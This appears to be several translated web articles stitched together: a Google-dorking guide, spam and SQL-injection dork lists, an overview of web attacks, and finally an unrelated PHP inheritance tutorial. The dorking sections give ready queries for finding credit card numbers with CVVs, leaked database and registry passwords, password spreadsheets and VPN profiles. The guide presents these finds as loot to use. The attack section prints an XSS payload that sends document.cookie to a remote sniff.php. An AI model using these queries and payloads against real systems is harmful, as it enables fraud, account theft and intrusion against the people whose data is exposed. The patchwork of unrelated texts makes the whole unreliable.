
Obtaining private data does not always mean hacking - sometimes it is published publicly. Knowledge of Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Today, everything is connected to the Internet, with little concern for restricting access. As a result, a lot of private data becomes the prey of search engines. Spider robots are no longer limited to web pages; they index all content available on the Internet and constantly add non-public information to their databases. Finding out these secrets is easy: you just need to know how to ask for them.

Looking for files

In capable hands, Google will quickly find everything that is lying around unprotected on the Internet, for example personal information and files meant for internal use. They are often hidden like a key under a doormat: there are no real access restrictions, the data simply sits in an out-of-the-way corner of the site that no links point to. The standard Google web interface provides only basic advanced search settings, but even these will be sufficient.

You can limit your Google search to a specific type of file using two operators: filetype and ext. The first specifies the format that the search engine determined from the file header, the second specifies the file extension regardless of the internal content. In both cases you only need to specify the extension in the query. Initially, the ext operator was convenient in cases where the file had no specific format signature (for example, for searching ini and cfg configuration files, which could contain anything). Now Google's algorithms have changed, and there is no visible difference between the operators: in most cases the results are the same.


Filtering the results

By default, Google searches for the entered words (and, in general, any entered characters) in all files on indexed pages. You can limit the search area by top-level domain, by a specific site, or by the location of the search sequence in the files themselves. For the first two options, use the site operator followed by the name of the domain or the selected site. For the third, a whole set of operators allows you to search for information in service fields and metadata. For example, allinurl will find the given words in the URLs themselves, allinanchor in the text of links (anchor text), allintitle in page titles, and allintext in the body of pages.

For each of these operators there is a lightweight version with a shorter name (without the all prefix). The difference is that allinurl will find links containing all the words, while inurl requires only the first of them to appear in the link; the second and subsequent words from the query can appear anywhere on the page. The inurl operator also differs from another operator with a similar meaning, site: the former lets you find any sequence of characters in a link to the document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the request produce a list of numbers and verification codes of credit cards that will expire only in two years (or when their owners get tired of feeding everyone).

allintext: card number expiration date /2017 cvv

When you read in the news that a young hacker “hacked into the servers” of the Pentagon or NASA, stealing classified information, in most cases we are talking about just such a basic technique of using Google. Suppose we are interested in a list of NASA employees and their contact information. Surely such a list is available in electronic form. For convenience or due to oversight, it may also be on the organization’s website itself. It is logical that in this case there will be no links to it, since it is intended for internal use. What words can be in such a file? At a minimum - the “address” field. Testing all these assumptions is easy.


inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Finds like this are just a pleasant bonus. A really solid catch comes from a more detailed knowledge of Google's operators for webmasters, of the Network itself, and of the structure of what you are looking for. Knowing the details, you can easily filter the results and refine the properties of the files you need so that what remains is truly valuable data. It is funny that bureaucracy comes to the rescue here: it produces standard formulations that are convenient for searching for secret information accidentally leaked onto the Internet.

For example, the Distribution statement stamp required by the US Department of Defense denotes standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B means intended only for internal use, C strictly confidential, and so on up to F. The letter X stands apart: it marks particularly valuable information representing a state secret of the highest level. Let those whose job it is search for such documents; we will limit ourselves to files with the letter C. According to DoD Instruction 5230.24, this marking is assigned to documents containing descriptions of critical technologies that fall under export control. Such carefully protected information can be found on sites in the .mil top-level domain, allocated to the US military.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that the .mil domain contains only sites of the US Department of Defense and its contractors. Search results restricted to this domain are exceptionally clean, and the titles speak for themselves. Searching for Russian secrets in this way is practically useless: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound botanical (the PP "Kiparis", the "Akatsia" self-propelled guns) or even fairy-tale (the TOS "Buratino").


By carefully studying any document from a site in the .mil domain, you can spot other markers to refine your search. For example, a reference to the export restrictions of "Sec 2751", which is also convenient for finding interesting technical information. Such documents are removed from time to time from the official sites where they once appeared, so if you cannot follow an interesting link in the search results, use Google's cache (the cache operator) or the Internet Archive.

Climbing into the clouds

In addition to accidentally declassified government documents, Google's cache occasionally turns up links to personal files from Dropbox and other data storage services that create "private" links to publicly accessible data. It is even worse with alternative and home-grown services. For example, the following query finds the data of all Verizon customers who have an FTP server enabled on their router and are actively using it.

allinurl:ftp://verizon.net

There are now more than forty thousand such smart people, and in the spring of 2015 there were many more of them. Instead of Verizon.net, you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the built-in FTP server, you can see files on an external storage device connected to the router. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer file downloading. All contents of such media are indexed by Google and other search engines, so you can access files stored on external drives via a direct link.

Looking at the configs

Before the widespread migration to the cloud, plain FTP servers ruled as remote storage, and they had plenty of vulnerabilities, many of which are still relevant today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the ws_ftp.ini file. It is easy to find and read, since all records are saved in text format and the passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is enough.

It is easy to decrypt such passwords using the WS_FTP Password Decryptor utility or a free web service.

When people talk about hacking an arbitrary website, they usually mean obtaining a password from logs and backups of the configuration files of CMS or e-commerce applications. If you know their typical structure, it is easy to pick the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user identifier (UID) and a corresponding password (pwd), and all this information is stored in files with the .inc extension. You can search for them as follows:

"pwd=" "UID=" ext:inc

Revealing DBMS passwords

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and MD5 hashes are written instead of the passwords themselves. Strictly speaking, a hash cannot be decrypted, but you can look for a match among known hash-password pairs.

There are still DBMSs that do not even use password hashing. The configuration files of any of them can simply be viewed in the browser.

intext:DB_PASSWORD filetype:env

On Windows servers, the registry has partly taken over the role of configuration files. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

filetype:reg HKEY_CURRENT_USER "Password"=

Let's not forget the obvious

Sometimes you can get to confidential information using data that was accidentally exposed and caught Google's attention. The ideal case is to find a list of passwords in some common format. Only desperate people store account information in a text file, a Word document or an Excel spreadsheet, but there are always enough of them.

filetype:xls inurl:password

On the one hand, there are plenty of means to prevent such incidents. It is necessary to set adequate access rights in .htaccess, keep the CMS patched, avoid dubious third-party scripts and close other holes. There is also the robots.txt file with its list of exclusions, which forbids search engines from indexing the files and directories listed in it. On the other hand, if the structure of robots.txt on some server differs from the standard one, it immediately becomes clear what they are trying to hide there.

A directory and file listing on any site begins with the standard heading "Index of". Since for service purposes it must appear in the title, it makes sense to limit the search with the intitle operator. Interesting things turn up in the /admin/, /personal/, /etc/ and even /secret/ directories.

Stay tuned for updates

Freshness is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between a "last second" filter (&tbs=qdr:s at the end of the request URL) and a "real time" filter (&tbs=qdr:1).

Google also implicitly reports the time interval in which a file was last updated. Through the graphical web interface, you can select one of the standard periods (hour, day, week and so on) or set a date range, but this method is not suitable for automation.

From the look of the address bar, you can guess a way to limit the output of results using the &tbs=qdr: construction. The letter y after it sets a limit of one year (&tbs=qdr:y), m shows the results for the last month, w for the week, d for the past day, h for the last hour, n for the last minute, and s for the last second. The very newest results, which Google has only just learned about, are found using the filter &tbs=qdr:1.

If you need to write a clever script, it is useful to know that a date range is set in Google in Julian format using the daterange operator. For example, this is how you can find PDF documents with the word confidential uploaded between January 1 and July 1, 2015.

confidential filetype:pdf daterange:2457024-2457205

The range is indicated in Julian date format without taking into account the fractional part. Translating them manually from the Gregorian calendar is inconvenient. It's easier to use a date converter.
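If you want to compute these numbers yourself, PHP's calendar extension can do it; the following minimal sketch (assuming the extension is available) reproduces the boundaries used in the query above.

<?php
// Julian day numbers for the daterange: operator.
// gregoriantojd(month, day, year) comes from PHP's calendar extension.
echo gregoriantojd(1, 1, 2015), "\n";   // 2457024  (1 January 2015)
echo gregoriantojd(7, 1, 2015), "\n";   // 2457205  (1 July 2015)
?>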

Targeting and filtering again

In addition to being written in the search query itself, operators can be passed directly in the URL. For example, the filetype:pdf refinement corresponds to the construction as_filetype=pdf. This makes it convenient to script any refinements. Say, output of results only from the Republic of Honduras is set by adding cr=countryHN to the search URL, and only from the city of Bobruisk by gcs=Bobruisk. You can find the complete list in the developer section.
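As a rough sketch (the parameter names are taken from the text above, and Google may change or ignore them at any time), such a URL could be assembled in PHP like this:

<?php
// Build a search URL with refinements passed as URL parameters
// instead of operators inside the query string.
$params = [
    'q'           => 'confidential',   // the search phrase itself
    'as_filetype' => 'pdf',            // equivalent of filetype:pdf
    'cr'          => 'countryHN',      // results only from Honduras
    'tbs'         => 'qdr:w',          // only results from the last week
];

echo 'https://www.google.com/search?' . http_build_query($params);
?>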

Google's automation tools are designed to make life easier, but they often add problems. For example, a user’s IP is used to determine their city via WHOIS. Based on this information, Google not only balances the load between servers, but also changes the search results. Depending on the region, for the same request, different results will appear on the first page, and some of them may be completely hidden. The two-letter code after the gl=country directive will help you feel like a cosmopolitan and search for information from any country. For example, the code of the Netherlands is NL, but the Vatican and North Korea do not have their own code in Google.

Often, search results end up cluttered even after using several advanced filters. In this case, it is easy to clarify the request by adding several exception words to it (a minus sign is placed in front of each of them). For example, banking, names and tutorial are often used with the word Personal. Therefore, cleaner search results will be shown not by a textbook example of a query, but by a refined one:

Intitle:"Index of /Personal/" -names -tutorial -banking

One last example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but it is either expensive or temporary and restricted, and subscribing just for yourself is too costly. It's good that there are group subscriptions, and with Google's help it is easy to become part of a group. To do this, just find a Cisco VPN configuration file, which has the rather unusual PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles. One request and you join, for example, the friendly team of the University of Bonn.

filetype:pcf vpn OR Group

INFO Google finds configuration files with passwords, but many of them are written in encrypted form or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

Passwords are stored encrypted, but Maurice Massard has already written a program to decrypt them and provides it for free through thecampusgeeks.com.

Hundreds of different types of attacks and penetration tests are carried out with the help of Google. There are many variants, affecting popular programs, major database formats, numerous vulnerabilities in PHP, clouds and so on. Knowing exactly what you are looking for makes it much easier to find the information you need (especially information that was never meant to be public). It is not only Shodan that feeds you interesting ideas: so does every database of indexed network resources!

How to search correctly using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you compose a search query correctly using special constructions, you can find what you are looking for much more efficiently and quickly =) In this article I will try to show how and what you need to do to search correctly.

Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators change the search, or even tell Google to perform a completely different type of search. For example, the link: construct is a special operator, and the query link:www.google.com will not perform a normal search; instead it will find all web pages that have links to google.com.
Alternative request types

cache: Shows the version of a web page stored in Google's cache. If you include other words in the query, Google will highlight them within the cached document.
For example, cache:www.site web will show the cached content with the word "web" highlighted.

link: Shows web pages that contain links to the specified page.
For example: link:www.site will display all pages that have a link to http://www.site

related: Displays web pages that are “related” to the specified web page.
For example, related: www.google.com will list web pages that are similar to Google's home page.

info: The query info: presents some of the information that Google has about the web page you are requesting.
For example, info:website will show information about our forum =) (Armada - Adult Webmasters Forum).

Other information requests

define: The define: query will provide a definition of the words you enter after it, collected from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks: Google will process the rest of the query terms as stock symbols, and link to a page showing ready-made information for these symbols.
For example, stocks:Intel yahoo will show information about Intel and Yahoo. (Note that you should type the ticker symbols, not the company name.)

Query Modifiers

site: If you include site: in your query, Google will limit the results to those websites it finds in that domain.
You can also search by individual zones, such as ru, org, com, etc ( site:com site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results to all query words in the title.
For example, allintitle: google search will return all of Google's pages related to search, such as Images, Blog, etc.

intitle: If you include intitle: in your query, Google will limit the results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl: Google will limit the results to all query words in the URL.
For example, allinurl: google search will return documents with google and search in the URL. As an option, you can also separate words with a slash (/); then the words on both sides of the slash will be searched for within the same page. Example: allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:site

intext: searches for the specified word only in the page text, ignoring the title, link text and other things not related to the body. There is also a derivative of this modifier, allintext:, meaning that all further words in the query will be searched for only in the page text, which can also be important, ignoring words that frequently appear in links.
For example, intext:forum

daterange: searches within a time frame (daterange:2452389-2452389); the dates are specified in Julian format.

Well, and all sorts of interesting examples of queries

Examples of writing queries for Google. For spammers

inurl:control.guest?a=sign

site:books.dreambook.com "Homepage URL" "Sign my" inurl:sign

site:www.freegb.net Homepage

inurl:sign.asp "Character Count"

"Message:" inurl:sign.cfm "Sender:"

inurl:register.php "User Registration" "Website"

inurl:edu/guestbook "Sign the Guestbook"

inurl:post "Post Comment" "URL"

inurl:/archives/ "Comments:" "Remember info?"

"Script and Guestbook Created by:" "URL:" "Comments:"

inurl:?action=add "phpBook" "URL"

intitle:"Submit New Story"

Magazines

inurl:www.livejournal.com/users/ mode=reply

inurl:greatestjournal.com/ mode=reply

inurl:fastbb.ru/re.pl?

inurl:fastbb.ru/re.pl? "Guest book"

Blogs

inurl:blogger.com/comment.g? "postID" "anonymous"

inurl:typepad.com/ "Post a comment" "Remember personal info?"

inurl:greatestjournal.com/community/ "Post comment" "addresses of anonymous posters"

"Post comment" "addresses of anonymous posters" -

intitle:"Post comment"

inurl:pirillo.com "Post comment"

Forums

inurl:gate.html?"name=Forums" "mode=reply"

inurl:"forum/posting.php?mode=reply"

inurl:"mes.php?"

inurl:"members.html"

inurl:forum/memberlist.php?"

It gets funny every time people start talking about private dorks.
Let's start by defining what a dork is and what "private" means:

DORK (DORKA) is a mask, in other words a query to a search engine, in response to which the engine returns a list of website pages whose addresses contain that same DORK.

Private - information to which only one person or a small group of people working on one project has access.

Now let's look at the phrase "private dork".
If we send a search request for a given dork and it returns some kind of result, then anyone can do the same, and therefore the information it provides is not private.

And a little about game/money/shop sellers.
A lot of people like to make dorks of this type:

steam.php?q= bitcoin.php?id= minecraft.php?id=

Let’s imagine that we don’t understand anything about dorks and try to see how many links Google gives us:

You probably immediately had thoughts like this in your head: “Khrenovich, you don’t know shit, look at how many links there are, people are practically selling money!”
But I’ll tell you no, because now let’s see what links such a request will give us:


I think you get the point, now let's use the Google operator inurl: for an exact search and let's see what comes up:


Yeah, the number has dropped sharply, but otherwise it is the same story. And if we take into account that there will be duplicate domains plus links like ***.info/vaernamo-nyheter/dennis-steam.php, then the bottom line is that we are left with 5-10 usable results.

How many people do you think will add such links to their website? Of course, only a few.

Which means there is no point in writing dorks like steam.php?id=, so the question is: what kind of dorks should we cook up?
It is actually quite simple: we need to collect as many links as possible with our dork. The largest number of links will come from the most primitive pattern of the form index.php?id=


Oops, as much as 538 million, a good result, right?
Let's add more inurl:


Well, half of them have disappeared, but now almost all links will have index.php?id=

From the above we can conclude: we need the most frequently used paths and file names; it is from them that we will get the most results.

I think many people had thoughts like: “Well, what next? We need thematic sites, and not all sorts of sites for puppy lovers!” Well, of course, but to move on to the topics of the sites, we will need to get acquainted with Google operators, let's get started. We will not analyze all operators, but only those that will help us with page parsing.

What are the operators we are interested in:

inurl: Shows sites that contain the specified word in the page address.
Example:
We need sites where the page address contains the word cart. We create a request like inurl:cart, and it gives us all the links whose address contains the word cart. That is, with this request we achieved stricter compliance with our conditions and eliminated links that do not suit us.

intext: pages are selected based on the content of the page.
Example:
Let's say we need pages on which the word bitcoin appears. We create a request like intext:bitcoin, and it gives us links where the word bitcoin is used in the text.

intitle: pages are displayed that have the words specified in the query in the title tag. I think you already understand how to write queries, so I won’t give examples.

allinanchor: the operator shows pages that have the words of interest to us in the anchor text of links pointing to them.

related: perhaps one of the important operators that provides sites with similar content.
Example:
related:exmo.com - it will give us exchanges, try checking it yourself.

Well, perhaps all the main operators that we need.

Now let's move on to building dorks using these operators.

Before each dork we will put inurl:

inurl:cart?id= inurl:index?id= inurl:catalog?id=


Let's also use intext: say we are looking for games, which means we need words like dota2, portal, CSGO...

intext:dota2 intext:portal intext:csgo

If we need a phrase, then allinurl:

allinurl:GTA SAMP...

Now let’s glue it all together and get this look:

inurl:cart?id= intext:dota2
inurl:cart?id= intext:portal
inurl:cart?id= intext:csgo
inurl:cart?id= allinurl:GTA SAMP
inurl:index?id= intext:dota2
inurl:index?id= intext:portal
inurl:index?id= intext:csgo
inurl:index?id= allinurl:GTA SAMP
inurl:catalog?id= intext:dota2
inurl:catalog?id= intext:portal
inurl:catalog?id= intext:csgo
inurl:catalog?id= allinurl:GTA SAMP

As a result, we got gaming dorks with a narrower and more precise search.
So use your brains and experiment a little with search operators and keywords; there is no need to go overboard and write dorks like hochymnogoigr.php?id=

Thank you all, I hope you got at least something useful from this article.

I decided to talk a little about information security. The article will be useful for novice programmers and those who have just begun to engage in Frontend development. What is the problem?

Many novice developers get so carried away with writing code that they completely forget about the security of their work. Most importantly, they forget about vulnerabilities such as SQL injection and XSS. They also come up with easy passwords for their administrative panels, leaving them open to brute-force attacks. What are these attacks and how can you avoid them?

SQL injection

SQL injection is the most common type of attack on a database, carried out through an SQL query to a specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer error made when writing the code that works with the database and, specifically, the SQL queries.

A SQL injection attack is possible due to incorrect processing of the input data used in SQL queries. If a hacker's attack is successful, you risk losing not only the contents of your databases, but also the passwords and logins of the administrative panel. And this data is quite enough to completely take over the site or make irreversible changes to it.
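To make the mistake concrete, here is a minimal PHP sketch (the database, table and column names are assumptions): the first query concatenates user input straight into the SQL text, the second keeps it out with a prepared statement.

<?php
$pdo = new PDO('mysql:host=localhost;dbname=shop', 'user', 'pass');

// Vulnerable: the value of ?id= is pasted into the SQL as-is,
// so id=1' breaks the query and id=1 OR 1=1 returns every row.
$id     = $_GET['id'];
$result = $pdo->query("SELECT * FROM products WHERE id = $id");

// Safer: a prepared statement keeps the value out of the SQL text.
$stmt = $pdo->prepare('SELECT * FROM products WHERE id = ?');
$stmt->execute([(int) $_GET['id']]);
$row = $stmt->fetch();
?>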

The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on what DBMS is used and how the script itself is implemented. There are many vulnerable sites for SQL injections in the world. This is easy to verify. Just enter “dorks” - these are special queries for searching for vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How to use them? Just enter them into Google or Yandex. The search engine will give you not just a vulnerable site, but also the page with this vulnerability. But we won't stop there; let's make sure the page really is vulnerable. To do this, it is enough to put a single quote ' after the value "id=1". Something like this:

  • inurl:games.php?id=1'

And the site will give us an error about the SQL query. What does our hacker need next?

And then he needs this very link to the error page. In most cases, further work on the vulnerability takes place in the Kali Linux distribution with its utilities for this purpose: injecting code and performing the necessary operations. How exactly this happens, I cannot tell you here, but you can find information about it on the Internet.

XSS Attack

This type of attack targets cookies. Users, in turn, love to save them. Why not? What would we do without them? After all, thanks to cookies, we don't have to enter the password for Vk.com or Mail.ru a hundred times. Few people refuse them. But on the Internet, a rule often plays into hackers' hands: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To implement an XSS attack, our hacker needs knowledge of JavaScript. At first glance, the language is very simple and harmless, because it does not have access to computer resources. A hacker can only work with JavaScript in a browser, but that’s enough. After all, the main thing is to enter the code into the web page.

I will not talk in detail about the attack process. I will only tell you the basics and meaning of how this happens.

A hacker can add JS code to some forum or guest book:

document.location.href = "http://192.168.1.7/sniff.php?test"

The scripts will redirect us to the infected page, where the code will be executed: be it a sniffer, some kind of storage or an exploit, which will somehow steal our Cookies from the cache.

Why JavaScript? Because JavaScript is great at handling web requests and has access to Cookies. But if our script takes us to some site, the user will easily notice it. Here the hacker uses a more cunning option - he simply enters the code into the picture.

img = new Image();

img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? It’s very simple - do not click on suspicious links.
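On the developer side, one common extra measure (shown here only as a minimal sketch, not a complete defence) is to escape user-supplied text before echoing it back into a page, so injected <script> tags are rendered as harmless text.

<?php
// Escape a visitor's comment before printing it into HTML.
$comment = $_POST['comment'] ?? '';
echo htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
?>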

DoS and DDos Attacks

DoS (from the English Denial of Service) is a hacker attack on a computer system with the goal of bringing it to failure: creating conditions under which legitimate users of the system cannot access its resources (servers), or such access is difficult. A system failure can also be a step towards taking it over if, in an emergency situation, the software leaks any critical information: for example, a version number, part of the program code, and so on. But most often this is a means of economic pressure: downtime of a service that generates income, bills from the provider and the cost of fending off the attack hit the "target" hard in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow almost any system to be brought down without leaving legally significant evidence.

What is the difference between a DoS and a DDoS attack?

DoS is an attack designed in a clever way. For example, if the server does not check the correctness of incoming packets, then a hacker can make a request that will take forever to process, and there will not be enough processor time to work with other connections. Accordingly, clients will be denied service. But it will not be possible to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can cope with such overload without any problems.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there can be hundreds or more of them. Even super-powerful servers may not be able to cope with such an overload. Let me give you an example.

A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts shouting loudly. It is either impossible or very difficult to talk. Solution: call security, who will calm down and remove the person from the premises. DDoS attacks are when a crowd of thousands of such ill-mannered people rushes in. In this case, the security will not be able to tie everyone up and take them away.

DoS and DDoS attacks are carried out from so-called zombie computers: machines of users hacked by attackers, whose owners do not even suspect that their computer is participating in an attack on some server.

How to protect yourself from this? In general, no way. But you can make things more difficult for a hacker. To do this, you need to choose a good hosting with powerful servers.

Bruteforce attack

A developer can come up with many systems of protection against attacks, fully review the scripts he has written, check the site for vulnerabilities and so on. But when he gets to the last step of building the site, namely putting a password on the admin panel, he may forget about one thing. The password itself!

It is strictly not recommended to set a simple password. This could be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and uncomplicated attack - Brute force.

Brute force is a dictionary password search attack using special programs. Dictionaries can be different: Latin, enumeration by numbers, say, up to a certain range, mixed (Latin + numbers), and there are even dictionaries with unique characters @#4$%&*~~`’”\ ? etc.

Of course, this type of attack is easy to avoid. Just come up with a complex password. Even a captcha can save you. Also, if your site is made on a CMS, then many of them detect this type of attack and block the IP. You must always remember that the more different characters in a password, the more difficult it is to guess.
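A quick back-of-the-envelope sketch in PHP shows why this matters: the number of candidate passwords grows explosively with both the character set and the length (the character counts below are approximate).

<?php
// Rough keyspace sizes for different alphabets and lengths.
$lowercase = 26;            // a-z
$alnum     = 26 + 26 + 10;  // a-z, A-Z, 0-9
$withSpec  = $alnum + 10;   // plus roughly ten special characters

foreach ([8, 12] as $len) {
    printf("length %2d: %.1e vs %.1e vs %.1e combinations\n",
        $len, $lowercase ** $len, $alnum ** $len, $withSpec ** $len);
}
?>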

How do Hackers work? In most cases, they either suspect or know part of the password in advance. It is quite logical to assume that the user’s password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacking. Basically, hackers take a range of 5 to 10 characters and add several characters that they may know in advance. Next, passwords with the required ranges are generated. The Kali Linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, and the search speed increases by as much as 10 times. And now we see that an attack in such a simple way is quite real. But it’s not just websites that are subject to brute force.

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always get distracted somewhere or miss something. We are programmers, but not programmed machines. Always be on guard, because losing information can have serious consequences!

Inheritance is an object-oriented programming mechanism that allows you to describe a new class based on an existing one (parent).

A class that is obtained by inheriting from another is called a subclass. This relationship is usually described using the terms "parent" and "child". A child class is derived from the parent and inherits its characteristics: properties and methods. Typically, a subclass adds new functionality to the functionality of the parent class (also called a superclass).

To create a subclass, you must use the extends keyword in the class declaration, followed by the name of the class from which you are inheriting:
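A minimal sketch of what such a pair of classes might look like (the names Cat, my_Cat, $age and add_age() come from the surrounding text; the bodies are assumed):

<?php
class Cat
{
    public $age;

    public function __construct()
    {
        $this->age = 0;
    }

    public function add_age()
    {
        $this->age++;
    }
}

// my_Cat inherits $age and add_age() from Cat and adds nothing of its own yet.
class my_Cat extends Cat
{
}

$kitty = new my_Cat();   // the Cat constructor runs automatically
$kitty->add_age();       // inherited method
echo $kitty->age;        // inherited property, prints 1
?>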

The subclass inherits access to all methods and properties of the parent class, since they are declared public. This means that for instances of the my_Cat class we can call the add_age() method and access the $age property, even though they are defined in the Cat class. In the example above, the subclass also has no constructor of its own. If a subclass does not declare its own constructor, then the superclass constructor is automatically called when instances of the subclass are created.

Please note that subclasses can override properties and methods. By defining a subclass, we ensure that its instance is defined by the characteristics of first the child and then the parent class. To understand this better, consider an example:
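A sketch of such overriding might look like this (the concrete values are assumed):

<?php
class Cat
{
    public $age = 2;

    public function foo()
    {
        echo "Age: {$this->age}\n";
    }
}

class my_Cat extends Cat
{
    // The subclass overrides the property with its own value.
    public $age = 5;
}

$kitty = new my_Cat();
// foo() is not defined in my_Cat, so the Cat implementation runs,
// but it reads $age from my_Cat and therefore prints 5.
$kitty->foo();
?>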

When calling $kitty->foo(), the PHP interpreter cannot find such a method in the my_Cat class, so the implementation of this method defined in the Cat class is used. However, the subclass defines its own $age property, so when it is accessed in the $kitty->foo() method, the PHP interpreter finds that property in the my_Cat class and uses it.

Since we have already covered the topic of specifying argument types, it remains to say that if the parent class is specified as the type, then the method will also accept all of its descendants; look at the following example:
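A minimal sketch of this behaviour (the method body and properties are assumed; the point is only the Cat type hint):

<?php
class Cat
{
    public $name = 'Murka';

    // The parameter is type-hinted with Cat, but any descendant of Cat
    // is accepted here as well.
    public function foo(Cat $obj)
    {
        echo "Got a cat named {$obj->name}\n";
    }
}

class my_Cat extends Cat
{
    public $name = 'Kitty';
}

$cat   = new Cat();
$kitty = new my_Cat();

$cat->foo($kitty);   // an instance of my_Cat is treated as a Cat
?>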

We can treat an instance of the my_Cat class as if it were an object of type Cat, i.e. we can pass an object of type my_Cat to the foo() method of the Cat class, and everything will work as expected.

parent operator

In practice, subclasses may need to extend the functionality of parent class methods. By extending functionality by overriding superclass methods, subclasses retain the ability to first execute the parent class's code and then add code that implements the additional functionality. Let's look at how this can be done.

To call the desired method of a parent class, you need to refer to that class itself. PHP provides the parent keyword for this purpose. The parent operator gives subclasses access to the methods (and constructors) of the parent class so that they can add to their existing functionality. To refer to a method in the context of a class, the "::" symbol (two colons) is used. The syntax of the parent operator is:

parent::parent_class_method()

This construct will call a method defined in the superclass. Following this call, you can place your own program code that will add new functionality:
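A sketch of such a constructor chain (the property names and arguments are assumed):

<?php
class Cat
{
    public $name;

    public function __construct($name)
    {
        $this->name = $name;
    }
}

class my_Cat extends Cat
{
    public $age;

    public function __construct($name, $age)
    {
        parent::__construct($name);   // run the parent constructor first
        $this->age = $age;            // then add the subclass's own initialization
    }
}

$kitty = new my_Cat('Kitty', 3);
echo "{$kitty->name} is {$kitty->age} years old\n";
?>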

When a child class defines its own constructor, PHP does not automatically call the parent class's constructor. This must be done manually in the subclass constructor. The subclass first calls the constructor of its parent class in its constructor, passing the necessary arguments for initialization, executes it, and then executes the code that implements additional functionality, in this case initializing a property of the subclass.

The parent keyword can be used not only in constructors but in any other method whose functionality you want to extend; this is achieved by calling the parent class's version of the method:
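For example, a sketch built around the getstr() method mentioned in the next paragraph (the string values are assumed):

<?php
class Cat
{
    public function getstr()
    {
        return 'I am a cat';
    }
}

class my_Cat extends Cat
{
    public function getstr()
    {
        $str = parent::getstr();        // call the superclass version first
        $str .= ' and also a kitten';   // then add new functionality
        return $str;
    }
}

$kitty = new my_Cat();
echo $kitty->getstr();   // prints "I am a cat and also a kitten"
?>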

Here, the getstr() method from the superclass is first called, the value of which is assigned to a variable, and after that the rest of the code defined in the subclass method is executed.

Now that we've covered the basics of inheritance, we can finally look at the issue of visibility of properties and methods.

public, protected and private: access control

Up to this point, we have explicitly declared all properties as public. And this type of access is set by default for all methods.

Members of a class can be declared as public, protected, or private. Let's look at the difference between them:

  • Public properties and methods can be accessed from any context.
  • Protected properties and methods can be accessed either from the containing class or from its subclass. No external code is allowed access to them.
  • You can make class data inaccessible to the calling program by using the private keyword. Such properties and methods can only be accessed from the class in which they are declared. Even subclasses of this class do not have access to such data.
In short: public is open access, private is access only from the class's own methods, and protected is protected access.
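A compact sketch putting the three modifiers side by side (the class and member names are assumed):

<?php
class Cat
{
    public $name = 'Murka';          // accessible from anywhere
    protected $age = 2;              // accessible from Cat and its subclasses
    private $secret = 'hunts mice';  // accessible only inside Cat

    public function tell()
    {
        // all three members are visible inside the declaring class
        echo "{$this->name}, {$this->age}, {$this->secret}\n";
    }
}

class my_Cat extends Cat
{
    public function describe()
    {
        echo $this->name;       // OK: public
        echo $this->age;        // OK: protected is visible in a subclass
        // echo $this->secret;  // error: private members of Cat are not visible here
    }
}

$cat = new Cat();
echo $cat->name;      // OK: public
// echo $cat->age;    // error: protected cannot be read from outside
// echo $cat->secret; // error: private cannot be read from outside
$cat->tell();
?>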

The protected modifier, from the point of view of the calling program, looks exactly the same as private: it prohibits access to the object's data from the outside. However, unlike private, it allows you to access data not only from methods of your class, but also from methods of a subclass.


